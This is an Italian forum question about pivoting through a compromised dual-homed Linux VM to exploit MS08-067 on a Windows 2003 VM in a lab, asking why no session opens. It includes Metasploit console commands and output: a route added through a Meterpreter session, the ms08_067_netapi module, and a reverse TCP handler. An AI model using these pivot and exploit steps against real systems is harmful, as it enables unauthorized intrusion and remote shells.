Sto cercando di sfruttare una VM Windows su una sottorete diversa dietro una VM Linux dual home in cui ho già una shell. Per semplificare, ho una shell reverse_tcp meterpreter sulla VM Linux (192.168.47.144) e la VM Windows (192.168.128.133) è 2003 e vulnerabile a MS08-067 (l'ho testata direttamente). Infine, la VM Linux può sicuramente colpire il servizio SMB sulla VM di Windows.
ubuntu:~$ ip -o addr show | grep -o '192.168.47.144' && nc -nvv 192.168.128.133 445
192.168.47.144
Connection to 192.168.128.133 445 port [tcp/*] succeeded!
La shell meterpreter reverse_tcp sulla VM Linux si ricollega alla porta 5555, quindi non c'è un conflitto con il numero di porta.
[*] Sending stage (826872 bytes) to 192.168.47.144
[*] Meterpreter session 2 opened (192.168.47.136:5555 -> 192.168.47.144:47395) at 2017-10-08 11:21:30 -0500
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > route add 192.168.128.0 255.255.255.0 2
[*] Route added
msf exploit(ms08_067_netapi) > route
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
192.168.128.0 255.255.255.0 Session 2
[*] There are currently no IPv6 routes defined.
msf exploit(ms08_067_netapi) > set RHOST 192.168.128.133
RHOST => 192.168.128.133
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.47.136:4444
[*] 192.168.128.133:445 - Automatically detecting the target...
[*] 192.168.128.133:445 - Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown
[*] 192.168.128.133:445 - We could not detect the language pack, defaulting to English
[*] 192.168.128.133:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.128.133:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
Inoltre ho dato a questa una corsa con LHOST 0.0.0.0 e LHOST 192.168.128.132 (l'indirizzo di subnet .128 della VM Linux), ma nessuna shell neanche lì. Cosa mi manca?
Ho anche provato a farlo manualmente attraverso il port forward di SSH come visto in link e ho finito con lo stesso risultato. L'exploit colpisce la VM di Windows ma non viene aperta alcuna sessione.
Questi sono i post principali a cui ho fatto riferimento.